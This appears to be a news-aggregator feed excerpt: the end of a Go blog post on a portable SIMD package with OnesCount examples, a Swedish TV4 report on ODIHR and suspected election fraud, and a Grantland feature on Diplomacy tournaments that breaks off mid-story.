var popcnt4x16 = [16]int8{0, 1, 1, 2, 1, 2, 2, 3, 1, 2, 2, 3, 2, 3, 3, 4}
var popcnt4x32 = [32]int8{
    0, 1, 1, 2, 1, 2, 2, 3, 1, 2, 2, 3, 2, 3, 3, 4,
    0, 1, 1, 2, 1, 2, 2, 3, 1, 2, 2, 3, 2, 3, 3, 4,
}
// OnesCount returns the number of one bits for each element.
func OnesCount(v simd.Int8s) simd.Int8s {
    switch x := v.ToArch().(type) {
    case archsimd.Int8x16:
        lut := archsimd.LoadInt8x16Array(&popcnt4x16)
        mask0f := archsimd.BroadcastInt8x16(0x0f)
        lo := x.And(mask0f)
        hi := x.ToBits().ReshapeToUint16s().ShiftAllRight(4).
                ReshapeToUint8s().BitsToInt8().And(mask0f)
        return simd.Int8sFromArch(lut.PermuteOrZero(lo).
                Add(lut.PermuteOrZero(hi)))
    case archsimd.Int8x32:
        lut := archsimd.LoadInt8x32Array(&popcnt4x32)
        mask0f := archsimd.BroadcastInt8x32(0x0f)
        lo := x.And(mask0f)
        hi := x.ToBits().ReshapeToUint16s().ShiftAllRight(4).
                ReshapeToUint8s().BitsToInt8().And(mask0f)
        return simd.Int8sFromArch(lut.PermuteOrZeroGrouped(lo).
                Add(lut.PermuteOrZeroGrouped(hi)))
    case archsimd.Int8x64:
        return simd.Int8sFromArch(x.OnesCount())
    default:
        // GODEBUG=simd=0 emulation
        return OnesCountEmulated(v)
    }
}

The interface conversion and type switch look like they should be inefficient, but the compiler-side implementation of simd specializes code and optimizes away the type switch.

NEON and Wasm both support Int8s.OnesCount() , so their implementation is much simpler, though it still uses Int8s.ToArch and Int8sFromArch .

//go:build goexperiment.simd && (wasm || arm64)
package simd_test
import (
    "simd"
    "simd/archsimd"
)
// OnesCount returns the number of one bits for each element.
func OnesCount(v simd.Int8s) simd.Int8s {
    // TODO when SVE is added, this won't work
    switch x := v.ToArch().(type) {
    case archsimd.Int8x16:
        return simd.Int8sFromArch(x.OnesCount())
    default:
        // GODEBUG=simd=0 emulation
        return OnesCountEmulated(v)
    }
}

Don’t forget that some people don’t have hardware SIMD support:

//go:build goexperiment.simd && !(amd64 || wasm || arm64)

package simd_test
import (
    "simd"
)
// OnesCount returns the number of one bits for each element.
func OnesCount(v simd.Int8s) simd.Int8s {
    return OnesCountEmulated(v)
}

And to complete the exercise, a separate emulation function shared as a fallback across all implementations:

//go:build goexperiment.simd
package simd_test
import (
    "simd"
)
// OnesCountEmulated returns the number of one bits for each element.
func OnesCountEmulated(v simd.Int8s) simd.Int8s {
    a := [2]uint64{}
    v.ToBits().ReshapeToUint64s().Store(a[:])
    a0, a1 := a[0], a[1]
    m1 := uint64(0x5555555555555555)
    m2 := uint64(0x3333333333333333)
    m4 := uint64(0x0f0f0f0f0f0f0f0f)
    a0 = (a0 & m1) + ((a0 >> 1) & m1)
    a1 = (a1 & m1) + ((a1 >> 1) & m1)
    a0 = (a0 & m2) + ((a0 >> 2) & m2)
    a1 = (a1 & m2) + ((a1 >> 2) & m2)
    a0 = (a0 & m4) + ((a0 >> 4) & m4)
    a1 = (a1 & m4) + ((a1 >> 4) & m4)
    a[0], a[1] = a0, a1
    return simd.LoadUint64s(a[:]).ReshapeToUint8s().BitsToInt8()
}

API intersection and method emulation

Whatever operations the simd package offers need to run acceptably well on most architectures. As a first step, any operation that is supported everywhere, can easily be supported on simd . This tends to include loads, stores, arithmetic, and comparisons (but not all comparisons!).

A naive intersection across SIMD methods from different architectures still leaves plenty of holes. These are filled by adding emulations to the various architecture-specific archsimd APIs. These APIs already contain many trivial emulations to simplify life for Go programmers; signed and unsigned integer addition use the same instruction, but in the same way that Go supports the + operator for both int and uint , the archsimd package provides both Int8x16.Add(Int8x16) and Uint8x16.Add(Uint8x16) , even though those compile to the same instruction. Modern programming languages also don’t expect programmers to know how to implement floating point negation and absolute value with bit fiddling, so archsimd implements that where necessary, or “emulates” if you look at it just so.

There are many emulations that require just 2 or 3 instructions; for example, some architectures support only a same-value shift distance across vector elements, while others support a different shift distance for each vector element. To support scalar shifting in simd , we emulate scalar shift with vector shift. Some architectures lack some unsigned comparisons–these are just signed comparison, plus two XORs with a constant.

Not all missing instructions are that simple. The “carryless multiply” instruction is important to cryptography and CRC checksumming, but it isn’t always supported. Leaving that out of the simd API would prevent its use for some important algorithms. Therefore, we provide an emulation, and because one important use is in crypto, its run time does not vary depending on its inputs.

In other cases, rather than implement a primitive instruction like “add pairs” (also called “horizontal addition”), for the simd package in the next release we will provide the higher level operation that add pairs is usually used for, which is sum reduction. This also helps insulate users from vector-length dependence; even given the hardware instruction for adding pairs, the number of reduction steps depends on the vector length.

The constraint of supporting all platforms, including ones that we predict will appear in archsimd within the next year or so, forces a somewhat conservative approach to which methods we add to simd . Riscv64, ppc64, s390x, and loong64 all have their own SIMD extensions.

GODEBUG settings

On platforms where there is some hardware support, behavior can be modified with GODEBUG, to make it easier to test simd -using code with various hardware configurations. In Go 1.27, levels of SIMD support are roughly described by vector length:

  • GODEBUG=simd=0 means use emulation for SIMD operations even if the hardware support is available.
  • GODEBUG=simd=128 means use 128-bit vectors and their features. If the features aren’t available, panic immediately.
  • GODEBUG=simd=256 means use 256-bit vectors and their features, if possible.
  • GODEBUG=simd=512 means use 512-bit vectors and their features, if possible.
  • GODEBUG=simd=+128 means use 128-bit vectors and their features even if some features are not supported. If unsupported instructions are used, the code will panic, but if they are not it may still run. An example of this is Raspberry Pi, which supports NEON but lacks PMULL (carryless multiply).
  • GODEBUG=simd=+256 means use 256-bit vectors and their features even if some features are not supported. If unsupported instructions are used, the code will panic, but if they are not it may still run. An example of this is Apple Silicon’s amd64 emulation, which supports AVX2 but not VPCLMULQDQ (again, carryless multiply).
  • GODEBUG=simd=+512 means use 512-bit vectors, even if some features are not supported.

Implementation details

If you are debugging code that uses simd , or even just look at a stack trace, you will notice some weird extra types and methods. The reason is that simd is both a package, an internal implementation package, and some AST rewriting in the front end of the compiler.

The AST rewrite creates multiple specialized copies of functions, variables, and types that mention simd types, where simd types are replaced with references to size-specialized types in simd/internal/bridge . Each of these bridge types is defined as an archsimd type, but with a restricted set of methods. The specialized functions, variables, and types acquire a suffix of the form @simdNNN , where NNN is either a vector length (128, 256, or 512) or 0, indicating emulation. Functions that mention simd internally, but not in their signature, are converted to wrappers that switch on the SIMD level detected at program start, and call the appropriate specialized version of that function. Specialized functions call other specialized functions directly without dispatch overhead (and perhaps with inlining). This rewrite strategy was chosen as a compromise between code duplication and SIMD performance; the overhead is hoisted as high as necessary to avoid dispatch within SIMD computations, but not higher. If SIMD dispatch appears “too low” in a computation, a gratuitous mention of a simd type will move it upwards, as in this example:

func BenchmarkVpsumdSIMD(b *testing.B) {
    // mention "simd" so the benchmark loop calls specialized vpsumd3 directly
    var _ simd.Uint64s
    var w, x, y, z uint64 = ... // magic constants omitted.
    var lo, hi uint64
    for b.Loop() {
        // vpsumd3 does simd stuff, but lacks a simd signature,
        // so that it can be compared with non-SIMD emulations.
        lo, hi = vpsumd3(w, x, y, z)
    }
    sinkLo, sinkHi = lo, hi
}

What’s coming

We plan to publish a blog post describing archsimd in greater detail soon.

For Go 1.28, we intend to add SVE support to archsimd , and also hope to add that to simd . More importantly, we hope to add additional SIMD operations to those that the simd package already supports (e.g., OnesCount, mask operations, reduction operations, vector shuffling operations). Go 1.28 will also include a small number of “feature variants” to avoid downgrading all the way to full emulation for platforms that have a hardware vector implementation but just lack one or a few operations, such as Raspberry Pi.

International observers to investigate Swedish election fraud

Hacker News
www.tv4.se
2026-09-24 16:55:44
Comments...
Original Article

Internationella valobservatörer ska följa upp misstänkta valfusken

Beskedet inför nästa val: ”Skulle givetvis granska alla händelser”

・ Uppdaterad:

Inför valet bedömde OSSE:s valövervakningsorgan ODIHR att Sverige inte behövde några internationella valobservatörer.
Sedan dess har flera misstänkta valfusk anmälts i landet.
Nu uppger organisationen att sådana händelser kommer att vägas in vid framtida bedömningar av svenska val.

Inför årets val besökte OSSE:s valövervakningsorgan ODIHR Sverige för att bedöma om det fanns behov av internationella valobservatörer.

Efter möten med myndigheter, partier, medier och andra aktörer blev slutsatsen att någon observationsinsats inte behövdes. I sin rapport lyfte ODIHR fram det höga förtroendet för det svenska valsystemet och Valmyndighetens arbete.

Samtidigt hade Sverige inför valet genomfört förändringar efter tidigare kritik från organisationen. Bland annat infördes möjligheten att ansöka om ackreditering som valobservatör, något som ODIHR tidigare efterlyst.

I våras konstaterade ODIHR att förtroendet för den svenska valprocessen var högt och avrådde från internationell valövervakning.

I våras konstaterade ODIHR att förtroendet för den svenska valprocessen var högt och avrådde från internationell valövervakning.

Foto: ODIHR/OSSE

Flera valärenden efter valet

Sedan valet har flera misstänkta valrelaterade brott uppmärksammats i Sverige.

Mest uppmärksammad är utredningen i Borlänge där tre personer misstänks för otillbörligt verkande vid röstning.

Samtidigt har Riksenheten mot korruption bekräftat att ytterligare en förundersökning om misstänkt valbrott pågår. Brottsrubriceringen är otillbörlig förmån vid röstning.

Polisen utreder även två fall av misstänkt röstköp i Piteå och Luleå, enligt Piteåtidningen . Detta efter att en person lagt upp en annons i en Facebookgrupp.

Samtidigt har antalet överklaganden av valresultatet ökat kraftigt. Enligt Valprövningsnämnden har i skrivande stund nära 10 000 överklaganden kommit in efter valet, vilket är betydligt fler än vid tidigare val.

ODIHR: Händelserna ingår i framtida bedömningar

TV4 Nyheterna har frågat ODIHR om de misstänkta valbrotten hade kunnat påverka organisationens beslut att inte rekommendera några valobservatörer till Sverige.

Men organisationen vill inte kommentera de svenska utredningarna.

”Alla ODIHR:s bedömningar och kommentarer om ett val bygger på observationer av hela valprocessen. Vi kan därför inte uttala oss om det fall du nämner”, skriver ODIHR:s talesperson Thomas Rymer i ett mejl till TV4 Nyheterna.

Samtidigt framhåller han att händelser som inträffar mellan valen vägs in när organisationen på nytt bedömer ett lands behov av internationell valövervakning.

”Skulle givetvis granska alla händelser”

Det innebär att uppmärksammade händelser och frågor som väckts sedan ODIHR:s senaste besök i Sverige kan bli en del av underlaget vid en framtida granskning.

”Inför framtida val i Sverige skulle ODIHR följa samma process som i detta fall – skicka en behovsbedömningsdelegation för att avgöra om och i vilken form en valövervakning ska genomföras. Delegationen skulle givetvis granska alla händelser som inträffat sedan det senaste besöket, och dessa skulle ingå i delegationens bedömning”, skriver Rymer.

ODIHR:s delegation träffar företrädare för bland annat myndigheter, partier, kandidater, medier och civilsamhället, enligt Thomas Rymer.

”Alla frågor som tas upp och all information som samlas in under dessa möten ligger till grund för delegationens rekommendation om huruvida och i vilken form en observationsverksamhet ska genomföras”, skriver Rymer.

The Board Game of the Alpha Nerds (2014)

Hacker News
grantland.com
2026-09-24 16:53:39
Comments...
Original Article

I t was the summer of 1909. I was on the south coast of Spain. I remember it well because the season was almost over. Peace was within reach, I felt. There had been a vote to end the war, and the English had told me to support it. But the vote needed to be unanimous to pass, and it failed. The Russian, the Italian, they thought the English voted against it and that I had been lied to. Why should I believe them? The English and I had worked together against all of them for years now. Of course they’d want to sow distrust between us. Now time was ticking. I desperately wanted peace. I wasn’t sure my country would survive another couple of years, with or without England’s help. There wouldn’t be another vote until after the fall.

“Will you support my army in Spain this fall?” I asked.

“Nah. That ain’t happenin’,” the Englishman replied. A wave of dread came over me. He intended to betray me.

“How could you do this to me? After everything I’ve done for you.”

“I guess I’m just a hard muthafucka like that.”

And with that he walked away, leaving me standing in the hallway, mouth agape. He rejoined the other players at the board, who all stared at me, fury in their eyes. We told you so.

For the past eight hours I had been in the basement of a dorm in Chapel Hill, North Carolina, playing a board game called Diplomacy along with six other men. Each of us was vying against 80 other people to be crowned the world champion of Diplomacy at the end of the weekend here at Dixiecon. 1 One of those men, Brian Ecton, a high school math teacher from Prince George’s County, Maryland, with hair like Katt Williams and a mouth to match, approached me right at the start, sizing me up as a beginner and offering an alliance. He explained exactly how it would work and said we’d share a draw at the end. I had no reason not to agree.

For the next several hours each of the other players would take turns dragging me aside to explain to me how Brian was manipulating me, how he was going to betray me, how I should betray him first and work with them against Brian. I dismissed them all. After all, who’s to say they wouldn’t betray me as well? I was outmatched in this game. Safer to pick a player and stick with him come what may, I thought. But here I stood, on the verge of elimination, and the other players were pissed. According to them, I could have avoided this if I had listened to them hours ago.

“Don’t you realize that some of us traveled a very long distance to win this tournament?” a player from France said to me with disgust. “And because you won’t stab 2 this guy, you’re going to die and bring all of us down with you.”

“Are you going to be paid for writing this story?” a Scottish player asked me. “Because I am losing three days’ wages to be here so that I can get screwed by you.”

I still don’t know whom I should have trusted, if anyone. All I know is that I felt stupid, stressed out, humiliated, and sad. I had several shouting matches with a few of these guys. Some of them got personal. And all I had to show for my loyalty to Brian Ecton and my righteous indignation toward the other players was nothing at all. I was physically exhausted and emotionally abused. I hated Brian, the other players all hated me, and I hated myself most of all. I had to purse my lips extra hard to fight the urge to cry.

Settlers of Catan, eat your goddamn heart out.

I f you’ve ever heard of Diplomacy, chances are you know it as “the game that ruins friendships.” It’s also likely you’ve never finished an entire game. That’s because Diplomacy requires seven players and seven or eight hours to complete. Games played by postal mail, the way most played for the first 30 years of its existence, could take longer than a year to finish. Despite this, Diplomacy is one of the most popular strategic board games in history. Since its invention in 1954 by Harvard grad Allan B. Calhamer, Diplomacy has sold over 300,000 copies and was inducted into Games Magazine’ s hall of fame alongside Monopoly, Clue, and Scrabble.

The game is incredibly simple. The game board is a map of 1914 Europe divided into 19 sea regions and 56 land regions, 34 of which contain what are known as “supply centers.” Each player plays as a major power (Austria-Hungary, Turkey, Italy, England, France, Russia, Germany) with three pieces on the board (four for Russia) known as “home supply centers.” Each piece can move one space at a time, and each piece has equal strength. When two pieces try to move to the same space, neither moves. If two pieces move to the same space but one of those pieces has “support” from a third piece, the piece with support will win the standoff and take the space. The goal is to control 18 supply centers, which rarely happens. What’s more common is for two or more players to agree to end the game in a draw. Aside from a few other special situations, that’s pretty much it for rules.

There are two things that make Diplomacy so unique and challenging. The first is that, unlike in most board games, players don’t take turns moving. Everyone writes down their moves and puts them in a box. The moves are then read aloud, every piece on the board moving simultaneously. The second is that prior to each move the players are given time to negotiate with each other, as a group or privately. The result is something like a cross between Risk, poker, and Survivor — with no dice or cards or cameras. There’s no element of luck. The only variable factor in the game is each player’s ability to convince others to do what they want. The core game mechanic, then, is negotiation. This is both what draws and repels people to Diplomacy in equal force; because when it comes to those negotiations, anything goes. And anything usually does.

T he year was 1966. A 17-year-old boy named Edi Birsan was sitting in his room in Brooklyn staring at a letter he received in the mail. He scanned the same sentence over and over: I am not against a three-way draw and I will not take any more supply centers … On the table in front of him was a Diplomacy game board, showing a game at about the midway point.

Two years before, Edi’s mother had split. She and Edi’s stepfather’s marriage had been on the rocks for years. They’d fight, break up, get back together, lather, rinse, repeat. One day in 1964 she forged Edi’s signature on a bank slip and withdrew $5,000, the entirety of a savings account Edi had had since he was 9 years old, and eventually lit out for California. She stopped off in Tijuana for a Mexican divorce, and that was that.

By his own admission, Edi was introverted and repressed. A year after his mom took off, Edi was in therapy. His therapist saw in him a need to channel his bottled-up aggression, and to learn how to trust people again. She gave him a gift — a board game. I read in a magazine that this was Kennedy’s favorite game. They’d play it in the White House . 3 She told him it would help him deal with betrayal.

Edi had a hard time rounding up seven people with whom to play the game. Eventually he discovered that most people played through the mail. He sent off a couple of dollars to subscribe to a magazine (or zine, as they were called) that collected and published the moves submitted by postal players in various games. In between issues Edi would correspond with the other players by mail, laying out his grand plans and coaxing people into alliances. He’d spend hours crafting the perfect letters to his fellow players, carefully choosing his words and taking care to describe how his strategy would benefit them both. He was usually good at it, too. And he prided himself on being a decent and trustworthy ally.

Now here he was, midway through a game he had played well for months. He and two other players stood to share a three-way draw. He read the sentence in the letter again. I am not against a three-way draw and I will not take any more supply centers …

Edi took out scissors and a pen from a drawer and set to work on the letter, painstakingly doctoring it. When he was finished he held up the letter proudly and read it to himself. I am against a three-way draw and I will take three more supply centers … He put the forgery in the mail to the third player. Then he waited.

A llan Calhamer invented the game in 1954 while he was still a law student at Harvard. He aimed to sell it to one of the major game companies, but they all passed. In 1959 he self-financed 500 sets and sold them all to toy stores around New York. The game was picked up in 1961 by a small game publisher called Games Research. But because of how difficult it was to organize seven people for an entire day to play a game, sales were less than brisk. 4 It looked like Diplomacy wasn’t long for this world. Until the nerds saved it.

John Boardman was an editor of a number of amateur science fiction fanzines in 1963. In those days, pre– Star Trek , science fiction was still a highly niche subculture. Ever since the 1930s, fanzines were the primary way that sci-fi fans communicated and shared stories and ideas. John Boardman was also a fan of the game Diplomacy, but had a difficult time getting players together for a game. But he had an idea: He’d publish an ad in one of his sci-fi fanzines to see if anyone was interested in playing by mail. The response was encouraging. In May 1963, Boardman organized the first play-by-mail game of Diplomacy and the first Diplomacy zine, Graustark . Within four years there would be at least 32 more zines filled with postal Diplomacy games. Soon Games Research started promoting playing the game by mail by including the names and addresses of the zine editors with the game.

As Diplomacy grew in popularity across North America with play-by-mail games, some of the more hard-core players were curious about how they would fare against each other in a face-to-face game. What started out as a casual, informal gathering of top players in a backyard eventually grew to a yearly convention held on a college campus. They called it DipCon, and it became the definitive tournament for crowning the national Diplomacy champion. 5

In 1976 the rights to the game were purchased by Avalon Hill, one of the largest publishers of strategy board games and war games in the world. 6 The company had also started a gaming convention the year before in Baltimore called Origins. It invited the Diplomacy community to hold DipCon at Origins II, and the result was the largest Diplomacy tournament ever held in North America, with around 230 players.

With Avalon Hill’s support and reach, Diplomacy found an international audience and rapidly grew in popularity in Europe, particularly in the U.K. The game’s core community was still the editors and readers of the amateur zines, however. Through writings in those zines by new international players, the idea was floated that there should be a tournament in the U.K. In 1988, the first ever World DipCon was held in Birmingham, England, with the site rotating to a different country every year thereafter. Since 1988 the World DipCon has been held in 10 different countries. The winner of World DipCon is accepted around the world by the Diplomacy community as the official world champion.

David Hood, a North Carolina attorney, arrived at the 2014 World DipCon opening ceremony driving a yellow Cadillac and wearing a seersucker suit. He arrived with Mrs. North Carolina, a beauty queen in full tiara and sash, in tow. 7

The organizer of Dixiecon, Hood had been a fixture in the Diplomacy hobby for many decades and was a two-time North American champion. Hood had been running Dixiecon since the 1980s, when he was a student at UNC. 8

The gathering of amateur diplomats for the 2014 World DipCon was a fairly homogeneous group. Among the 87 players were only two women, two players under the age of 21, and four African Americans, including 2005 Dixiecon champion Brian Ecton. 9 The players were as you’d probably expect from any international gathering of board gamers: bookish, unkempt, and slightly awkward. There were exceptions to these stereotypes, to be sure. If there was one thing that this particular group of nerds was not, it was nebbish.

“There is a definite amount of social awkwardness that goes along with any kind of gaming. You find the more social breed of gamer in Diplomacy,” said Siobhan Nolen, a hip, 28-year-old history grad student from Northern California and one of the two women entered in this year’s World DipCon. Her red hair was pulled back in a pony tail, revealing a Scrabble tile tattoo on the back of her neck. The daughter of a hard-core board-gamer who dragged her to conventions her entire life, Nolen is as expert in the culture of board-game nerds as anyone you’ll find. “This is a kind of alpha. It attracts very intelligent people. It attracts extroverted people. If you’re introverted and won’t put yourself out there, it won’t work out for you. It attracts people who like to talk. If you don’t like to talk, this game’s over pretty quickly for you.”

Nolen got hooked on Diplomacy when she was 13 years old. Her father had brought her to a gaming convention called Conquest. She was a bored adolescent wandering around the convention with her brother, not interested in playing any of the games. Then she came across six people sitting at a Diplomacy board, many of them not much older than she was. The oldest player, a man in his fifties, beckoned. “We need one more player.” Nolen looked at the board, the pieces, the players. On the face it looked like another boring war game like her dad played. “No way am I going to play that,” she replied. But Diplomacy was different from any game she had ever played. It wasn’t just tactics, just pushing pieces on a board. In fact, it was barely that. It had a human element. She found that in her very first game she was able to win against older, more experienced gamers just because she was good at convincing them to help her out. She was captivated by it. The older player asked her if she’d like to play again sometime and asked her for her email. His name was Edi Birsan.

Photo courtesy of David Hill

T he year was 1999. A 50-year-old Edi Birsan sat in front of his computer, the glow from the monitor the only light in the room. He stared at the email on the screen. I do not accept your terms …

Over the past 30 years Birsan had become something of a legend in the Diplomacy community. He helped grow the hobby through publishing his own play-by-mail zines in the 1970s, then by helping organize many of the larger DipCon events. He established a national organization to set rules and guidelines and he traveled to other countries to play in European Diplomacy events well before there was a World DipCon. He had even played with Allan B. Calhamer, the game’s inventor, and drubbed him. 10

One thing that Birsan was sure of was that the game was better when played face-to-face. He much preferred the tournaments and house games he traveled to over the games played by mail. With the advent of the Internet, face-to-face Diplomacy had been dwarfed by the volume of people now playing the game over email. So much so that an email game had been organized to pit the top email players against the top face-to-face players. Birsan was one of those face-to-face players. And he wasn’t happy about the way this game had been going.

I do not accept your terms …

Birsan picked up the telephone and dialed 411. He asked for a number in Houston, wrote it down, and then hung up the receiver. He took a deep breath, then picked up the phone and dialed.

“Hello?”

“This is Edi Birsan.”

“What do you want?”

“I want to talk about this email you sent me.”

“No.”

“What do you mean ‘no’?”

“I can’t believe you called me on the phone! You can’t do that!”

“I’ve been doing this for 30 years!”

“I’ve been playing Diplomacy for over three years and I’ve never once received a phone call or even talked to another player.”

“Are you serious?”

“Don’t ever call me again.”

Click.

I t was well past one o’clock in the morning in a suite on the second floor of our dorm when someone first suggested that we vote for a draw. My first match at Dixiecon had begun around 7 p.m. and there had been only one player eliminated from the game in six hours. Of the six of us remaining, one player, a former world champion named Chris Martin, was playing as Italy and down to a single unit, an army stuck somewhere in Austria. Without any other pieces to lend himself support, Martin was as good as eliminated — unless he had an ally to keep him in the game.

Martin, who has a PhD in dance, is a soft-spoken, fast-talking charmer whom other Diplomacy players call “the newbie whisperer” because of his affinity for allying with inexperienced players and getting them to do his bidding. He revels in this. Martin was knocking on death’s door when he convinced me, Siobhan Nolen, and a University of Arizona economics professor named Mark Stegeman to keep him alive. His reasoning? None of us was good enough at the game tactically to survive the alliance of the other two players, whether we stuck together or not.

He had a point, even if it was completely self-serving. The other two players on the board were Toby Harris, a top British player whose shaved head gave him a passing resemblance to Jason Statham and who was one of the favorites (along with Martin) to win the world championship; and Andy Bartalone, a Mack truck of a man with a booming voice and a penchant for booze and gambling — everyone affectionately called him “Buffalo.” Toby and Buffalo were not interested in any six-way draw. Their proposal? Kill Chris Martin and split it up five ways instead. More points for everyone!

“They won’t do that,” Martin whispered to us outside in the hall. “Once I’m gone they will cut one of you up next. Maybe all three. Right now we can work together and form a stalemate line that they can’t break, and we can force them to draw.”

Martin’s logic was sound. A stalemate line was an unbreakable formation that would force the game into a draw. The only way to break it would be to convince one of the players participating in it to betray the others. It was possible we could kill Martin and keep our stalemate line without him, but the three of us were unsure that we had the tactical skills to not make any mistakes. With Martin on our team, we were sure not to screw up. And, as Martin lied to us, eliminating him would net us only two points each. 11

“This is ridiculous!” bellowed Buffalo. “Siobhan, can we talk to you in the hall?”

Nolen looked at us and shrugged, then followed Harris and Buffalo out to the hall. When they returned, we looked at Nolen for any sign that she had flipped on us. Everyone wrote their moves on small slips of paper and put them in a box. Then Martin pulled them out and read them aloud. Nolen didn’t break. The alliance held. Harris was livid.

“Can I talk to you for a moment?” he said to Martin. And the two best players walked out in the hall together, leaving the rest of us alone with Buffalo. The room fell silent, save for the sound of Buffalo’s heavy, labored breath. Stegeman would speak first.

“I don’t see why we continue to play. We’re just wasting time. We all want the draw. This guy wants the draw.” He motioned toward Buffalo.

“ Excuse me?”

“Come on. You want the draw. You should, anyway. You don’t want to play until five in the morning.” Stegeman was insinuating that Buffalo should be happy with a six-way draw, perhaps that he was fortunate to even be in the mix. Buffalo blew his top.

“You want some?!” he yelled, loud enough to wake the entire dorm. “You don’t know me! Bring it. BRING. IT.” As he stormed out of the room, Buffalo shouted, “I’ll play all night. I don’t give a damn.”

Nolen and I looked at the older, affable Stegeman, she with irritation, me with fear. This was no longer fun. It was just tense and weird.

“To make a statement like that about someone you’ve never met before after we had been playing for six hours was pretty irritating,” Buffalo told me later. “I’ve invested six hours in this. I’m tied for the top but I’m going to have a terrible result because the rest of the board is unwilling to move.”

I saw this happen over and over again throughout the weekend. Players would get so angry because other players wouldn’t cooperate with them that they would take to shouting, browbeating, cursing, making insults. Often the anger was directed at players known as “alliance players,” or, more pejoratively, “care bears”: players who refuse to break alliances and will play only for draws.

“People laugh at me, they call me a care bear,” said Thomas Haver, a scientist from Columbus, Ohio. “If you’re a strong alliance player and it’s hard to break your alliances up, they say you’re a care bear.” The game is designed for cooperation, he argues. Every power starts out completely equal; every piece moves exactly the same. “By its very nature you need to cooperate, coordinate with someone else.”

Players like Brian Ecton disagree. “If you don’t play for the solo every time you sit down to play, you ain’t playing the game right.” The vast majority of the players I met at Dixiecon, American and European alike, agreed with Ecton. Alliances are meant to be broken. Draws are shameful. The only glory is in a solo victory, no matter how difficult it is or seldom it happens. 12 “If everyone played for a draw, you’d just have seven-way draws all the time,” Ecton said. “I guess Dave Maletsky would like that.”

Dave Maletsky sat in the parking lot of the dorm in a beach chair he’d brought with him to the tournament. He’s a large man with glasses and a thin beard. He wore an enormous straw hat — nearly a sombrero — a yellow Hawaiian shirt, shorts, and sandals. He looked like he’d be just as comfortable at a Jimmy Buffett show as a Diplomacy tournament.

“I think my results speak for themselves,” he replied when I asked him about the accusation of being a care bear. Maletsky, a part-time nanny, has been involved in the world of Diplomacy for several years, even though he doesn’t really like the game that much. He tagged along with a friend to a Diplomacy event in Denver once just for the company, and made friends with many of the players he met. An avid gamer, Maletsky rarely misses a tournament and is very active in the hobby. He’s on a mission. “I feel by having a presence in the hobby I can make it better for future generations by working against toxic elements in the game.”

“The nature of the game is not for everyone,” said Maletsky. “It’s emotionally brutal at times. In order to succeed you have to work with someone all game, then trick them and lie to them and send their score spiraling down from where they thought it was going to be. And all of those negative consequences come from working with you, and that’s not pleasant.”

On this point, there is little disagreement. “Diplomacy is an incredibly uncomfortable game. Diplomacy is intense and uncomfortable and unsettling. There’s no two ways about it,” said Siobhan Nolen. “The game allows for absurdities in social interaction. You can do whatever you want and there are no consequences.”

Thomas Haver agreed. “If it’s just, ‘Hey, it’s just a game, no hard feelings,’ then it allows them to get away with things that are considered taboo. When people play the game, you get to see their real personality. That’s when they take off the mask.”

Toby Harris and Matt Shields playing Diplomacy

Toby Harris and Matt Shields

For some players, the aggressive nature of the game and the tension it can create is a point of pride. “You have to have a thick skin to play this game,” Buffalo said. “Bad things are going to happen.” Even the gentle newbie whisperer, Chris Martin, agrees. “You have to separate some wheat from chaff, and I don’t mean that in an elitist kind of way,” Martin said. “Every 10 people who like playing games, nine will not like playing Diplomacy.”

Maletsky’s solution? Shorter games, less emphasis on solo victories, more incentive for players to vote for draws early on. His system for scoring is unpopular among what he describes as “tournament sharks,” but he insists that it provides a better experience for new to midrange players. He said the goal should be to best simulate a “house game” of Diplomacy, where a group of friends sits down at home and opens the box and plays. To his mind, this is the way the game was intended to be played, not in tournaments where you keep score over several iterations. “Most people feel that the only true game you can have in a tournament is a binary result — one person wins and everyone else loses,” said Thomas Haver. “People enjoy the house games a lot better.”

Why water down the game for the weaker of heart? Because while tens of thousands play Diplomacy over email, the face-to-face game is struggling. That’s not just because of how much easier it is logistically to play over email. It’s also because the more emotionally traumatic elements of the game are intensified when you’re face-to-face with your opponent. And when the game is for points in a tournament with ego and a title on the line? “A lot of times players just lose their minds,” Maletsky said.

“There’s a guy here who last time we were together he was so mad he chucked a book at me,” said Haver. “When I saw that, I laughed, because ‘I win.’” For my part, I found it hard to laugh at rattling people to their emotional breaking point. As much as I was fascinated with this game, even the psychological elements of it, I was taken aback at how often players — even at the highest level — were pushed beyond their ability to think of it as just a game. Every single person I spoke with at Dixiecon told me the same thing, that to enjoy Diplomacy you need to leave all of that stuff on the board. After the 10th person told me, “We always go get a beer afterward,” I started to think it was less a practical maxim and more a personal mantra. It was a lot easier said than done.

“This hobby has a real problem with player retention,” said Maletsky. “It’s easy to get new players into the game, but it’s hard to get them to come back.” Fans of role-playing games enjoy the social aspect but dislike the tactical elements. Eurogamers are interested in Diplomacy’s unique game mechanics but dislike the fact that there is player elimination and direct conflict with opponents. But for most people, the problem is always the same: Diplomacy is just too intense.

Siobhan Nolen has tried to recruit other women to play the game, to no avail. “I don’t know that it caters itself to men, but it’s a very intimidating game.” Nolen once brought her best friend to an event. “Bless her heart she tried, but when we were finished she gave me a look and said, ‘Never again.’”

Chris Martin won’t even let his own 14-year-old son play the game. “He could play against high school students, junior high school students, and he would be fine. I wouldn’t discourage him from playing a friendly game, a house game.” But in a tournament? No way. “In a tournament situation, you encounter people who care a lot more about winning than [about] the emotional fragility of the person they’re sitting across from.”

One thing that struck me about this divide: Of the players who expressed the most discomfort with the cutthroat nature of the game, despite their skills and their reputations, none had ever won a world championship.

A nother late night at Dixiecon, about three o’clock in the morning. It was so late, the nightly poker game had already wrapped up and most of the recreational drinking had moved to the bar across the street or into the dorm rooms. Thomas Haver was still playing Diplomacy, though. His game had been going for more than eight hours. He was playing as Russia, and his ally, a Canadian player named Chris Brand, was playing as Turkey. They had allied right from the start — an alliance known as “the juggernaut” in Diplomacy parlance — and had been pushing through the board all night. They eliminated Austria quickly, but the other players saw the juggernaut and moved quickly to work together to try to stop it.

In a situation like this, in which a two-person alliance is taking on the whole world, what is required of the two allies is complete trust. To build that kind of trust, you need to make sacrifices for the good of the alliance. You need to refuse to grow too strong to keep your ally from worrying you might betray them. You leave yourself as vulnerable to an attack from them as they are to you. If an ally asks you for something — even if it means an imbalance in the relationship, that they grow a little stronger than you — you give it to them to build the trust. If you make a deal that you’ll work together and share the victory, you have to mean it when you say it, and show it in your actions. Act as if a gain for your partner at your expense is a wash. This is care bear diplomacy. This is how Thomas Haver plays the game. And at that late hour in that Chapel Hill basement, it appeared to be working. Haver and Brand’s juggernaut was nearing the end of what would surely be a two-way victory for them both. There was just one more move to make.

And that’s when Thomas Haver saw it.

